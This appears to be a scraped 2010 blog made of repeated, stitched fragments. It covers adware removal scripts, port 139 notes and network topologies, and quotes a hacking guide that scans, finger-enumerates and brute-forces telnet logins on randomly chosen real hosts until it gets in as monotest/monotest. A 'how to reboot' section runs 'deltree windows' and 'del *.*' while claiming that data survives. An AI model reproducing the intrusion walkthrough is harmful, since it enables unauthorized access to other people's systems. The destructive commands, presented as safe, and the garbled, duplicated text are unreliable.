File Behavior
AVENGER.EXE has been seen to perform the following behavior:
* The Process is packed and/or encrypted using a software packing process
* Adds a Registry Key (RUNONCE) to auto start Programs on system start up
* Creates a new Background Service on the machine
* This process creates other processes on disk
* This Process Deletes Other Processes From Disk
* Adds a Registry Key (RUN) to auto start Programs on system start up
* Registers a Dynamic Link Library File
* Executes a Process
* Found on infected systems and resists interrogation by security products
* Uses low level functions to hide itself from the user and from system/security processes
AVENGER.EXE has been the subject of the following behavior:
* Executed as a Process
* Has code inserted into its Virtual Memory space by other programs
* Created as a process on disk
* Executed from Temporary Folders
* Deleted as a process from disk
* Terminated as a Process
Please download The Avenger by Swandog46 to your Desktop.
* Double click on Avenger.zip to open the file and extract avenger.exe to your Desktop
* Copy the below quoted text (which is a script for Avenger) into your clipboard by highlighting it and pressing
CTRL+C
* Now, run The Avenger program by double clicking its icon on your Desktop.
* Under "Script file to execute" choose "Input Script Manually".
* Now click on the Magnifying Glass icon which will open a new window titled "View/edit script"
*Paste the text copied to clipboard into this window by pressing (Ctrl+V).
Files to delete:
%Windir%\System32\askearth17.exe
%Windir%\System32\ei.exe
%Windir%\System32\filgmo.exe
%Windir%\system32\iniwin32.dll
%Windir%\System32\pruttct.exe
%Windir%\System32\prutpct.exe
%Windir%\System32\prutsct.exe
%Windir%\System32\ptech.exe
%Windir%\System32\skytown.exe
%ProgramFiles%\data19
%Windir%\pi1.exe
%UserProfile%\Desktop\askearth17.exe
%UserProfile%\Desktop\ei.exe
%UserProfile%\Desktop\filgmo.exe
%UserProfile%\Desktop\prutpct.exe
%UserProfile%\Desktop\prutsct.exe
%UserProfile%\Desktop\ptech.exe
%UserProfile%\Desktop\skytown.exe
%UserProfile%\Local Settings\Temp\ei.exe
Folders to delete:
C:\PROGRAM FILES\E2G
C:\PROGRAM FILES\Windows AdStatus
Registry values to replace with dummy:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows | AppInit_DLLs
Registry keys to delete:
HKLM\software\e2g
HKLM\software\microsoft\windows\currentversion\explorer\browser helper objects\{3643abc2-21bf-46b9-b230-f247db0c6fd6}
* Click Done
* Now click on the Green Light to begin execution of the script
* Answer "Yes" twice when prompted.
The Avenger will automatically do the following:
* It will Restart your computer. (When the script being executed contains "Drivers to Unload",
The Avenger will actually reboot your system two times.)
* On reboot, it will briefly open a black command window on your desktop, this is normal.
* After the reboot, it creates a log file that should open with the results of Avenger’s actions. This log
file will be located at C:\avenger.txt
* The Avenger will also have backed up all the files, etc., that you asked it to delete, and will have zipped
them and moved the zip archives to C:\avenger\backup.zip.
Please attach the c:\avenger.txt file to your next message. Now continue with the below fixes!
Copy the bold text below to notepad. Save it as fixE2G.reg to your desktop. Be sure the "Save as"
type is set to "all files" Once you have saved it double click it and allow it to merge with the registry.
REGEDIT4
[-HKEY_CURRENT_USER\SOFTWARE\PTech]
[-HKEY_CLASSES_ROOT\AppID\{3B99F202-145A-4E5A-AC7B-88A36910BF5E}]
[-HKEY_CLASSES_ROOT\AppID\IeBHOs.DLL]
[-HKEY_CLASSES_ROOT\IeBHOs.Control.1]
[-HKEY_CLASSES_ROOT\IeBHOs.Control]
[-HKEY_CLASSES_ROOT\Interface\{8F0A06F6-DF4D-4D54-B8CA-E8EEDBAE6DDB}]
[-HKEY_CLASSES_ROOT\TypeLib\{3B99F202-145A-4E5A-AC7B-88A36910BF5E}]
[-HKEY_CLASSES_ROOT\CLSID\{3643ABC2-21BF-46B9-B230-F247DB0C6FD6}]
[-HKEY_CLASSES_ROOT\CLSID\{4A5B0528-1EE4-4871-8546-AB34DF31E861}]
[-HKEY_CLASSES_ROOT\CLSID\{4A5B0D43-13BE-4B7C-820E-660CED71CDBF}]
[-HKEY_CLASSES_ROOT\CLSID\{4A5B482D-E087-43C9-8FD6-0F36510CF2B9}]
[-HKEY_CLASSES_ROOT\CLSID\{4A5ADB4F-48EE-4840-8DAB-166A239F7E86}]
[-HKEY_LOCAL_MACHINE\Software\Classes\CLSID\[Random CLSID]
[-HKEY_LOCAL_MACHINE\Software\E2G]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\e2g Plugin]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3643ABC2-21BF-46B9-B230-F247DB0C6FD6}]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\e2g plugin]
[-HKEY_LOCAL_MACHINE\Software\Classes\AppID\{3B99F202-145A-4E5A-AC7B-88A36910BF5E}]
[-HKEY_LOCAL_MACHINE\Software\Classes\AppID\IeBHOs.DLL]
[-HKEY_LOCAL_MACHINE\Software\Classes\IeBHOs.Control.1]
[-HKEY_LOCAL_MACHINE\Software\Classes\IeBHOs.Control]
[-HKEY_LOCAL_MACHINE\Software\Classes\TypeLib\{3B99F202-145A-4E5A-AC7B-88A36910BF5E}]
[-HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{3643ABC2-21BF-46B9-B230-F247DB0C6FD6}]
Run HijackThis and select the following lines but DO NOT CLICK FIX until you exit
all browser sessions including the one you are reading in right now:
O2 - BHO: CControl Object - {3643ABC2-21BF-46B9-B230-F247DB0C6FD6} - C:\Program Files\E2G\IeBHOs.dll
O20 - AppInit_DLLs: iniwin32.dll
Wednesday, June 30, 2010
Tuesday, June 29, 2010
HOW TO REBOOT A COMPUTER
I use this procedure instead of fdisk or format when I have a problem or virus and don't want to lose data
, especially the info I keep in My Documents:
Boot from Me boot disk
At A:\ type [C:\] [enter]
At C:\ type [deltree windows] [enter]
this will take some time
At C:\ type [attrib -s -h -r] [enter]
At C:\ type [del *.*] [enter]
Press [Ctrl]+[Alt]+[Del] and let the computer restart with the boot disk.
Insure your bios is set to boot off the floppy drive, cdrom drive, and hdd in this order before you start this hassle.
When you restart your computer make sure you select the option to start with cdrom support.
Type X:\setup where "X" is the drive designation of the cdrom that contains your Me install disk. e.g., if it used to be e:, now it will be f:
Me will now give you a fresh install, however the data on your drives will remain intact.
, especially the info I keep in My Documents:
Boot from Me boot disk
At A:\ type [C:\] [enter]
At C:\ type [deltree windows] [enter]
this will take some time
At C:\ type [attrib -s -h -r] [enter]
At C:\ type [del *.*] [enter]
Press [Ctrl]+[Alt]+[Del] and let the computer restart with the boot disk.
Insure your bios is set to boot off the floppy drive, cdrom drive, and hdd in this order before you start this hassle.
When you restart your computer make sure you select the option to start with cdrom support.
Type X:\setup where "X" is the drive designation of the cdrom that contains your Me install disk. e.g., if it used to be e:, now it will be f:
Me will now give you a fresh install, however the data on your drives will remain intact.
TCP PORT 139
TCP Port 139
Netbios Session Service is used for resource sharing on Windows 9x, ME and NT. This is the port that is used to connect file shares for example.
Inbound Traffic
Outbound Traffic
Inbound Traffic
Inbound scans are typically systems which are trying to connect to file shares that might be available on your system and hence these should be blocked. While most of this traffic is the result of worms or viruses which can use open file shares to propagate, they also can be the result of malicious users attempt to connect to your computer. Once connected they can download, upload or even delete or edit files on the connected file share.
If you use open file shares (including sharing of printers, etc) on your local network (LAN), then you should be using a firewall such that your local file shares are not accessible from the internet.
Connecting to open file shares is likely the easiest and most common hack on the internet and yet one of the most effective for malicious activities like identity theft or installing RATs (Remote Access Trojans) to take control of systems remotely for example.
Outbound Traffic
Outbound scans if occurring in volume should be considered an indication of a possible worm infection on the source computer and should be investigated. If there are systems to which you remotely connect to, then those systems should be marked as trusted IPs within Link Logger such that future authorized events will be logged as normal traffic.
PORT 139 – Information
* Port Number: 139
* TCP / UDP: TCP
* Delivery: Yes
* Protocol / Name: [Malware known as Qaz]
* Port Description: [malware info: Qaz]
* Virus / Trojan: Yes, Caution!
TCP port 139 uses the Transmission Control Protocol. TCP is one of the main protocols in TCP/IP networks. Whereas the IP protocol deals only with packets, TCP enables two hosts to establish a connection and exchange streams of data. TCP guarantees delivery of data and also guarantees that packets will be delivered on port 139 in the same order in which they were sent. Guaranteed communication over port 139 is the key difference between TCP and UDP. UDP port 139 would not have guaranteed communication in the same way as TCP.
Because protocol TCP port 139 was flagged as a virus (colored red) does not mean that a virus is using port 139, but that a Trojan or Virus has used this port in the past to communicate.
Netbios Session Service is used for resource sharing on Windows 9x, ME and NT. This is the port that is used to connect file shares for example.
Inbound Traffic
Outbound Traffic
Inbound Traffic
Inbound scans are typically systems which are trying to connect to file shares that might be available on your system and hence these should be blocked. While most of this traffic is the result of worms or viruses which can use open file shares to propagate, they also can be the result of malicious users attempt to connect to your computer. Once connected they can download, upload or even delete or edit files on the connected file share.
If you use open file shares (including sharing of printers, etc) on your local network (LAN), then you should be using a firewall such that your local file shares are not accessible from the internet.
Connecting to open file shares is likely the easiest and most common hack on the internet and yet one of the most effective for malicious activities like identity theft or installing RATs (Remote Access Trojans) to take control of systems remotely for example.
Outbound Traffic
Outbound scans if occurring in volume should be considered an indication of a possible worm infection on the source computer and should be investigated. If there are systems to which you remotely connect to, then those systems should be marked as trusted IPs within Link Logger such that future authorized events will be logged as normal traffic.
PORT 139 – Information
* Port Number: 139
* TCP / UDP: TCP
* Delivery: Yes
* Protocol / Name: [Malware known as Qaz]
* Port Description: [malware info: Qaz]
* Virus / Trojan: Yes, Caution!
TCP port 139 uses the Transmission Control Protocol. TCP is one of the main protocols in TCP/IP networks. Whereas the IP protocol deals only with packets, TCP enables two hosts to establish a connection and exchange streams of data. TCP guarantees delivery of data and also guarantees that packets will be delivered on port 139 in the same order in which they were sent. Guaranteed communication over port 139 is the key difference between TCP and UDP. UDP port 139 would not have guaranteed communication in the same way as TCP.
Because protocol TCP port 139 was flagged as a virus (colored red) does not mean that a virus is using port 139, but that a Trojan or Virus has used this port in the past to communicate.
Monday, June 28, 2010
HTTPS(Secure Sockets Layer (SSL2))(443TCP)
This summary is not available. Please
click here to view the post.
Friday, June 25, 2010
HTTP (80 TCP)
HTTP (80 TCP)
Webservers are interesting beings - they are the most common service on the Internet - there are many of these running around. The two most common webservers are Microsoft IIS and Apache. They run respectively on Windows and UNIX (although Apache is available from Windows as well)...but you knew this right? In most cases (except for one) one generally cannot get full control over a webserver - it is thus, in terms of control, a less "vulnerable" service as telnet. The problem nowadays with webservers are that they serve a whole lot of data- this is, a lot of them contains data
- 38 - Breaking into computer networks from the Internet
that is just as sensitive as the data that you will find on a corporate internal fileserver. The attacks to webservers can be categorized- attacks that returns data that the server should not be returning (e.g. Abusing your rights on the server), executing commands on the server (even taking control of the server) and stopping the server (denial of service attacks). There are many tools out there that will scan a server for exploitable CGIs (these includes PERL scripts, DLLs, EXEs, PHPs and others) as well as looking for interesting directories or files. The tool we prefer (and we think a lot of people will agree) is something called whisker (by Rain Forrest Puppy, get it here http://www.wiretrip.net/rfp/p/doc.asp?id=21&iface=1). The latest version of whisker is version 1.4. Whisker is a PERL script that does intelligent scanning of webservers. We don't want to go into too much detail of the inner workings of the scanner - there is plenty of documentation on RFP's site - the bottom line is that whisker is highly configurable, and very effective. One of the more useful features of whisker is that it uses a vulnerability "database" - thus the engine uses "plugins", and the plugins can be updated. The security community adds new "signatures" every now and again to the database - this keeps the scanner current with all the new vulnerabilities that are discovered.
How do we use whisker? Give me a practical example! OK - let us assume that we want to scan a webserver somewhere. Lets begin with straightforward IIS webserver -no authentication, no SSL, no special cleanup, and no IDS - just static pages. We start whisker as follows:
perl whisker.pl -h 196.xxx.183.2
This host happens to be the primary MX record for the domain xxx.co.za. If we can control this host, we can probably also get some interesting data. The server was chosen because it does not facilitates virtual websites, and is a stock standard IIS version 4.0 server - with no additional data. Its prima function is that of mail serving - not serving webpages. The output looks like this:
-- whisker / v1.4.0 / rain forest puppy / www.wiretrip.net --
= - = - = - = - = - =
= Host: 196.xxx.183.2
= Server: Microsoft-IIS/4.0
+ 200 OK: GET /msadc/Samples/selector/showcode.asp
+ 200 OK: GET /msadc/samples/adctest.asp
+ 200 OK: GET /iisadmpwd/aexp4b.htr
+ 200 OK: HEAD /msadc/msadcs.dll
+ 200 OK: HEAD /_vti_inf.html
+ 200 OK: HEAD /_vti_bin/shtml.dll
+ 200 OK: HEAD /_vti_bin/shtml.exe
We can see that this host has a few vulnerabilities - maybe the most serious of them is that it hosts "msadcs.DLL". Abusing this DLL one can gain complete control of the server. The "Showcode.asp" ASP can be used to view any file on the same drive as the webroot, and the "aexp4b.htr" can be used to do brute force password attacks on the server. The scope of paper is not to describe every one of the 300 odd vulnerabilities that whisker tests for. We will rather concentrate on different scan types, bypassing IDS systems, connecting to SSL-enabled servers, and brute forcing authentication systems.
Lets look at some of the parameters that can be passed to whisker, and how we would use them (at this stage of the discussion the reader should REALLY try to read RFP's whisker documentation - get it here: http://www.wiretrip.net/rfp/bins/whisker/whisker.txt. We will only look at the common switches). One of the switches that is very useful is the "-V" switch - his tells whisker that the target is a virtually hosted site, and it will thus add the "host: XXX" entry in the HTTP header. But - how do we know if a site is virtually hosted? Let us assume that I want to find out if the site www.sensepost.com is virtually hosted. The forward entry for www.sensepost.com is 216.0.48.55. When I open a browser and enter the IP address 216.0.48.55 I get to a totally different website. The webserver running on 216.0.48.55 thus looks at the HTTP header and decides what
- Breaking into computer networks from the Internet [Roelof Temmingh & SensePost]
should be served - a virtually hosted site. Should I test for URLs (say brute forcing URLs) with whisker, we would thus add the -V switch, and specify the DNS names - not the IP number. If we should spec the IP number we will not be looking at the website www.sensepost.com, but at the underlying webserver - which might not be a bad idea, but maybe not the true intention. Hey - did I mention to read the whisker manual? Another switch that is used frequently is the -I switch. The -I switch fires up whisker's stealth mode - the IDS bypassing module. How does an IDS work - it looks for patterns or signatures. If we can disguise our patterns the IDS may not detect it. The -I switches disguise whisker's attacks in many ways
Webservers are interesting beings - they are the most common service on the Internet - there are many of these running around. The two most common webservers are Microsoft IIS and Apache. They run respectively on Windows and UNIX (although Apache is available from Windows as well)...but you knew this right? In most cases (except for one) one generally cannot get full control over a webserver - it is thus, in terms of control, a less "vulnerable" service as telnet. The problem nowadays with webservers are that they serve a whole lot of data- this is, a lot of them contains data
- 38 - Breaking into computer networks from the Internet
that is just as sensitive as the data that you will find on a corporate internal fileserver. The attacks to webservers can be categorized- attacks that returns data that the server should not be returning (e.g. Abusing your rights on the server), executing commands on the server (even taking control of the server) and stopping the server (denial of service attacks). There are many tools out there that will scan a server for exploitable CGIs (these includes PERL scripts, DLLs, EXEs, PHPs and others) as well as looking for interesting directories or files. The tool we prefer (and we think a lot of people will agree) is something called whisker (by Rain Forrest Puppy, get it here http://www.wiretrip.net/rfp/p/doc.asp?id=21&iface=1). The latest version of whisker is version 1.4. Whisker is a PERL script that does intelligent scanning of webservers. We don't want to go into too much detail of the inner workings of the scanner - there is plenty of documentation on RFP's site - the bottom line is that whisker is highly configurable, and very effective. One of the more useful features of whisker is that it uses a vulnerability "database" - thus the engine uses "plugins", and the plugins can be updated. The security community adds new "signatures" every now and again to the database - this keeps the scanner current with all the new vulnerabilities that are discovered.
How do we use whisker? Give me a practical example! OK - let us assume that we want to scan a webserver somewhere. Lets begin with straightforward IIS webserver -no authentication, no SSL, no special cleanup, and no IDS - just static pages. We start whisker as follows:
perl whisker.pl -h 196.xxx.183.2
This host happens to be the primary MX record for the domain xxx.co.za. If we can control this host, we can probably also get some interesting data. The server was chosen because it does not facilitates virtual websites, and is a stock standard IIS version 4.0 server - with no additional data. Its prima function is that of mail serving - not serving webpages. The output looks like this:
-- whisker / v1.4.0 / rain forest puppy / www.wiretrip.net --
= - = - = - = - = - =
= Host: 196.xxx.183.2
= Server: Microsoft-IIS/4.0
+ 200 OK: GET /msadc/Samples/selector/showcode.asp
+ 200 OK: GET /msadc/samples/adctest.asp
+ 200 OK: GET /iisadmpwd/aexp4b.htr
+ 200 OK: HEAD /msadc/msadcs.dll
+ 200 OK: HEAD /_vti_inf.html
+ 200 OK: HEAD /_vti_bin/shtml.dll
+ 200 OK: HEAD /_vti_bin/shtml.exe
We can see that this host has a few vulnerabilities - maybe the most serious of them is that it hosts "msadcs.DLL". Abusing this DLL one can gain complete control of the server. The "Showcode.asp" ASP can be used to view any file on the same drive as the webroot, and the "aexp4b.htr" can be used to do brute force password attacks on the server. The scope of paper is not to describe every one of the 300 odd vulnerabilities that whisker tests for. We will rather concentrate on different scan types, bypassing IDS systems, connecting to SSL-enabled servers, and brute forcing authentication systems.
Lets look at some of the parameters that can be passed to whisker, and how we would use them (at this stage of the discussion the reader should REALLY try to read RFP's whisker documentation - get it here: http://www.wiretrip.net/rfp/bins/whisker/whisker.txt. We will only look at the common switches). One of the switches that is very useful is the "-V" switch - his tells whisker that the target is a virtually hosted site, and it will thus add the "host: XXX" entry in the HTTP header. But - how do we know if a site is virtually hosted? Let us assume that I want to find out if the site www.sensepost.com is virtually hosted. The forward entry for www.sensepost.com is 216.0.48.55. When I open a browser and enter the IP address 216.0.48.55 I get to a totally different website. The webserver running on 216.0.48.55 thus looks at the HTTP header and decides what
- Breaking into computer networks from the Internet [Roelof Temmingh & SensePost]
should be served - a virtually hosted site. Should I test for URLs (say brute forcing URLs) with whisker, we would thus add the -V switch, and specify the DNS names - not the IP number. If we should spec the IP number we will not be looking at the website www.sensepost.com, but at the underlying webserver - which might not be a bad idea, but maybe not the true intention. Hey - did I mention to read the whisker manual? Another switch that is used frequently is the -I switch. The -I switch fires up whisker's stealth mode - the IDS bypassing module. How does an IDS work - it looks for patterns or signatures. If we can disguise our patterns the IDS may not detect it. The -I switches disguise whisker's attacks in many ways
Computer Network Topology
Computer network topologies can be categorized in the following categories.
• bus
• star
• ring
• mesh
• Tree.
Bus Topology
Bus topology uses a common backbone to connect all the network devices in a network in a linear shape. A single cable functions as the shared communication medium for all the devices attached with this cable with an interface connector. The device, which wants to communicate send the broadcast message to all the devices attached with the shared cable but only the intended recipient actually accepts and process that message.
Ethernet bus topologies are easy to install and don’t require much cabling and only a main shared cable is used for network communication. 10Base-2 and 10BaseT are two popular types of the Ethernet cables used in the Bus topology. Also, Bus network works with very limited devices. Performance issues are likely to occur in the Bus topology if more than 12-15 computers are added in a Bus Network. Additionally, if the Backbone cable fails then all network becomes useless and no communication fails among all the computers. Unlike in the Star topology in which if one computer is detached from a network then there is not effect on the other computers in a network.
Ring Topology
In ring Network, every computer or devices has two adjacent neighbors for communication. In a ring network, all the communication messages travel in the same directory whether clockwise or anti clockwise. Any damage of the cable of any cable or device can result in the breakdown of the whole network. Ring topology now has become almost obsolete.
FDDI, SONET or Token Ring Technology can be used to implement Ring Technology. Ring topologies can be found in office, school or small buildings.
Star Topology
In the computer networking world the most commonly used topology in LAN is the star topology. Star topologies can be implemented in home, offices or even in a building. All the computers in the star topologies are connected to central devices like hub, switch or router. The functionality of all these devices is different. I have covered the detail of each networking devices in the separate portion of my website. Computers in a network are usually connected with the hub, switch or router with the Unshielded Twisted Pair (UTP) or Shielded Twisted Pair Cables.
As compared to the bus topology, a star network requires more devices & cables to complete anetwork. The failure of each node or cable in a star network, won’t take down the entire network
as compared to the Bus topology.
However if the central connecting devices such as hub, switch or router fails due to any reason,then ultimately all the network can come down or collapse.
Tree Topology
Tree topologies are comprised of the multiple star topologies on a bus. Tree topologies integrate multiple star topologies together onto a bus. Only the hub devices can connect directly with the tree bus and each Hub functions as a root of a tree of the network devices. This bus/star/hybrid combination supports future expandability of the computer networks, much better than a bus or star.
Mesh Topology
Mesh topology work on the concept of routes. In Mesh topology, message sent to the destination can take any possible shortest, easiest route to reach its destination. In the previous topologies star and bus, messages are usually broadcasted to every computer, especially in bus topology. Similarly in the Ring topology message can travel in only one direction i.e clockwise or anticlockwise. Internet employs the Mesh topology and the message finds its route for its destination. Router works in find the routes for the messages and in reaching them to their destinations.The topology in which every devices connects to every other device is called a full Mesh topology unlike in the partial mesh in which every device is indirectly connected to the other devices.
• bus
• star
• ring
• mesh
• Tree.
Bus Topology
Bus topology uses a common backbone to connect all the network devices in a network in a linear shape. A single cable functions as the shared communication medium for all the devices attached with this cable with an interface connector. The device, which wants to communicate send the broadcast message to all the devices attached with the shared cable but only the intended recipient actually accepts and process that message.
Ethernet bus topologies are easy to install and don’t require much cabling and only a main shared cable is used for network communication. 10Base-2 and 10BaseT are two popular types of the Ethernet cables used in the Bus topology. Also, Bus network works with very limited devices. Performance issues are likely to occur in the Bus topology if more than 12-15 computers are added in a Bus Network. Additionally, if the Backbone cable fails then all network becomes useless and no communication fails among all the computers. Unlike in the Star topology in which if one computer is detached from a network then there is not effect on the other computers in a network.
Ring Topology
In ring Network, every computer or devices has two adjacent neighbors for communication. In a ring network, all the communication messages travel in the same directory whether clockwise or anti clockwise. Any damage of the cable of any cable or device can result in the breakdown of the whole network. Ring topology now has become almost obsolete.
FDDI, SONET or Token Ring Technology can be used to implement Ring Technology. Ring topologies can be found in office, school or small buildings.
Star Topology
In the computer networking world the most commonly used topology in LAN is the star topology. Star topologies can be implemented in home, offices or even in a building. All the computers in the star topologies are connected to central devices like hub, switch or router. The functionality of all these devices is different. I have covered the detail of each networking devices in the separate portion of my website. Computers in a network are usually connected with the hub, switch or router with the Unshielded Twisted Pair (UTP) or Shielded Twisted Pair Cables.
As compared to the bus topology, a star network requires more devices & cables to complete anetwork. The failure of each node or cable in a star network, won’t take down the entire network
as compared to the Bus topology.
However if the central connecting devices such as hub, switch or router fails due to any reason,then ultimately all the network can come down or collapse.
Tree Topology
Tree topologies are comprised of the multiple star topologies on a bus. Tree topologies integrate multiple star topologies together onto a bus. Only the hub devices can connect directly with the tree bus and each Hub functions as a root of a tree of the network devices. This bus/star/hybrid combination supports future expandability of the computer networks, much better than a bus or star.
Mesh Topology
Mesh topology work on the concept of routes. In Mesh topology, message sent to the destination can take any possible shortest, easiest route to reach its destination. In the previous topologies star and bus, messages are usually broadcasted to every computer, especially in bus topology. Similarly in the Ring topology message can travel in only one direction i.e clockwise or anticlockwise. Internet employs the Mesh topology and the message finds its route for its destination. Router works in find the routes for the messages and in reaching them to their destinations.The topology in which every devices connects to every other device is called a full Mesh topology unlike in the partial mesh in which every device is indirectly connected to the other devices.
Thursday, June 24, 2010
TCP( transfer control protocol)telnet (tcp 23)
Telnet (23 TCP)
TCP works in transport layer
The most prized port to find open could be the telnet port. An open telnet port usually denotes an UNIX host or a router. Sometimes an AS400 or mainframe could be found. Why are we excited about an open telnet port? The reason is twofold. First - the host may contain sensitive data in directories that are not properly protected - see the section on "finding the goods". The second reason is that UNIX hosts are the ideal "relaunch" platform. What I mean by this is that your should be able to upload your entire "toolbox" to the server, that you should be able to attack hosts that are usually firewalled or not routed from this server. Even if you are not able to upload a toolbox you should be able to telnet to other (internal) servers from a router or a UNIX server. How do we go about getting a shell (or Router prompt)? Usually a username and a password are required. In some cases only a username is needed, and in some cases only a password is needed for Cisco routers. The bottom line is that we need two or less "things" - be that a username or a password. How do we find these two things? There are some techniques to find a username (many of these techniques were used in our previous penetration testing example, so I will not show input/output):
1. Some routers or UNIX hosts will tell you when you have entered an incorrect username - even if you don't provide a password.
2. Telnet to port 25 and try to issue EXPN and VRFY commands. Try to expand (EXPN) list-like aliases such as abuse, info, list, all etc. In many cases these point to valid usernames.
3. Try to finger a user on the host. Later in this document we will look at finger techniques :)
4. Try anonymous FTP and get the password file in /etc. Although it should be shadowed, it may reveal valid usernames
5. Try anonymous FTP and do a cd ~user_to_test_for - see the section on FTP.
6. Use default usernames. A nice list of default usernames and passwords can be found at www.nerdnet.com/security/index.php
7. Try common usernames such as "test", "demo", "test01" etc.
8. Use the hostname or a derivative of the hostname as username.
9. See if the host is running a webserver and have a look at the website - you might learn more than you expect - look at the "Contact" section and see if you can't mine some usernames. Looking at the website may also help you to guess common usernames.
Ok, so now you have a rather long list of possible usernames. The idea would be to verify that these users exist. It would be a bonus if you could verify that the users exist. If we cannot verify that the user is valid we have to test it via the telnet protocol. We still need a password. Unfortunately there is no easy way to verify a password - you have to test this manually.
- 36 - Breaking into computer networks from the Internet [Roelof Temmingh & SensePost]
Manually?! I don't think so! BindView Corporation's RAZOR security team provided the world with VLAD ), a tool that packaged some very useful tools. One of these tools has the ability to test usernames and passwords for (amongst other things) telnet. (The tool does not have support for password only telnet daemons - such as some routers, but the author tells me they are looking into it). Without getting too involved in this tool, lets see how our technique works against an arbitrary host (to find a totally arbitrary host we use nmap to find a random host with open port 23: nmap -sT -iR -p 23) Nmap finds the site 216.xxx.162.79 open to telnet:
/tmp# telnet 216.xxx.162.79
Trying 216.xxx.162.79...
Connected to 216.xxx.162.79.
Escape character is '^]'.
SunOS 5.6
xxx.xxx.com
Welcome to xxxxxxxxxxxxx
force Running Solaris 2.6.0
login:
We telnet to port 25, and find that there are no mail daemon running - no EXPN or VFRY possibilities. It seems that there are no anonymous FTP - no getting the password file. The finger daemon is also not running. Let us leave this host alone - we don't want to offend XXX - they have implemented some measures to keep people out.
Another IP that nmap gives us is 216.xxx.140.132. This host (SCO UNIX) is running Sendmail and finger. When we do a finger command, we find many usernames. To get these into a single file we issue the following command:
finger @216.xxx.140.132 | awk '{print $1}' | uniq > usernames
The next step would be to see if can use these usernames with common passwords. We use VLAD's brute force telnet module as follows:
perl pwscan.pl -v -T 216.xxx.140.132,
with the usernames in the file account.db. The output of the pwscan.pl PERL script looks like this:
/ports/vlad-0.7.1# perl pwscan.pl -v -T 216.xxx.140.132
RAZOR password scanner - version: $Id: pwscan.pl,v
loveless Exp $
Checking 216.xxx.140.132
telnet check. User:angela, pass:angela
telnet check. User:angela, pass:
telnet check. User:angela, pass:12345
telnet check. User:angela, pass:abcdef
telnet check. User:angela, pass:god
telnet check. User:angela, pass:guess
telnet check. User:angela, pass:none
telnet check. User:angela, pass:password
telnet check. User:angela, pass:qwerty
telnet check. User:angela, pass:secret
telnet check. User:angela, pass:sex
telnet check. User:angela, pass:test
---cut---
Running through all usernames and common passwords, we find ..nothing. No username could be brute forced. Now what? The next step is to find more usernames. We attempt to the following:
finger test@216.xxx.140.132
The output looks like this:
- 37 - Breaking into computer networks from the Internet [Roelof Temmingh & SensePost]
/tmp# finger test@216.xxx.140.132
[216.xxx.140.132]
Login name: test In real life: TEST ACCOUNT
Directory: /home/test Shell: /OpenServer/bin/sh
Never logged in.
No unread mail
No Plan.
Login name: monotest In real life: Monorail Test
Directory: /home/monotest Shell: /OpenServer/bin/sh
pts038
No unread mail
No Plan.
This looks promising. The "test" user does not seem to have a weak password - we test it manually. The "monotest" user however delivers...logging in with username "monotest", and password "monotest" we gain access to the UNIX host:
/tmp# telnet 216.xxx.140.132
Trying 216.xxx.140.132...
Connected to xxxx.com.
Escape character is '^]'.
SCO UnixWare 7.1.0 (xxxx) (pts/42)
login: monotest
Password:
UnixWare 7.1.0
musapp
RESTRICTED RIGHTS LEGEND:
When licensed to a U.S., State, or Local Government,
all Software produced by SCO is commercial computer software
as defined in FAR 12.212, and has been developed exclusively
at private expense. All technical data, or SCO commercial
computer software/documentation is subject to the provisions
of FAR 12.211 - "Technical Data", and FAR 12.212 - "Computer
Software" respectively, or clauses providing SCO equivalent
protections in DFARS or other agency specific regulations.
Manufacturer: The Santa Cruz Operation, Inc., 400 Encinal
Street, Santa Cruz, CA 95060.
NOTICE: Unregistered SCO software is installed on your system. Please
refer to SCO's online help for registration information.
$ exit
The interesting thing about this is that the finger daemon returns all usernames that contains the word "test". In the same way we can finger users such as "admin", and "user", and get interesting results.
Most machines that are running telnet, and has more than a certain amount of users (mostly multi-user machines) almost always hosts users with weak or no passwords - the idea is just to find them. From here it is fairly certain that you will find a local SCO exploit that will elevate you to root.
TCP works in transport layer
The most prized port to find open could be the telnet port. An open telnet port usually denotes an UNIX host or a router. Sometimes an AS400 or mainframe could be found. Why are we excited about an open telnet port? The reason is twofold. First - the host may contain sensitive data in directories that are not properly protected - see the section on "finding the goods". The second reason is that UNIX hosts are the ideal "relaunch" platform. What I mean by this is that your should be able to upload your entire "toolbox" to the server, that you should be able to attack hosts that are usually firewalled or not routed from this server. Even if you are not able to upload a toolbox you should be able to telnet to other (internal) servers from a router or a UNIX server. How do we go about getting a shell (or Router prompt)? Usually a username and a password are required. In some cases only a username is needed, and in some cases only a password is needed for Cisco routers. The bottom line is that we need two or less "things" - be that a username or a password. How do we find these two things? There are some techniques to find a username (many of these techniques were used in our previous penetration testing example, so I will not show input/output):
1. Some routers or UNIX hosts will tell you when you have entered an incorrect username - even if you don't provide a password.
2. Telnet to port 25 and try to issue EXPN and VRFY commands. Try to expand (EXPN) list-like aliases such as abuse, info, list, all etc. In many cases these point to valid usernames.
3. Try to finger a user on the host. Later in this document we will look at finger techniques :)
4. Try anonymous FTP and get the password file in /etc. Although it should be shadowed, it may reveal valid usernames
5. Try anonymous FTP and do a cd ~user_to_test_for - see the section on FTP.
6. Use default usernames. A nice list of default usernames and passwords can be found at www.nerdnet.com/security/index.php
7. Try common usernames such as "test", "demo", "test01" etc.
8. Use the hostname or a derivative of the hostname as username.
9. See if the host is running a webserver and have a look at the website - you might learn more than you expect - look at the "Contact" section and see if you can't mine some usernames. Looking at the website may also help you to guess common usernames.
Ok, so now you have a rather long list of possible usernames. The idea would be to verify that these users exist. It would be a bonus if you could verify that the users exist. If we cannot verify that the user is valid we have to test it via the telnet protocol. We still need a password. Unfortunately there is no easy way to verify a password - you have to test this manually.
- 36 - Breaking into computer networks from the Internet [Roelof Temmingh & SensePost]
Manually?! I don't think so! BindView Corporation's RAZOR security team provided the world with VLAD ), a tool that packaged some very useful tools. One of these tools has the ability to test usernames and passwords for (amongst other things) telnet. (The tool does not have support for password only telnet daemons - such as some routers, but the author tells me they are looking into it). Without getting too involved in this tool, lets see how our technique works against an arbitrary host (to find a totally arbitrary host we use nmap to find a random host with open port 23: nmap -sT -iR -p 23) Nmap finds the site 216.xxx.162.79 open to telnet:
/tmp# telnet 216.xxx.162.79
Trying 216.xxx.162.79...
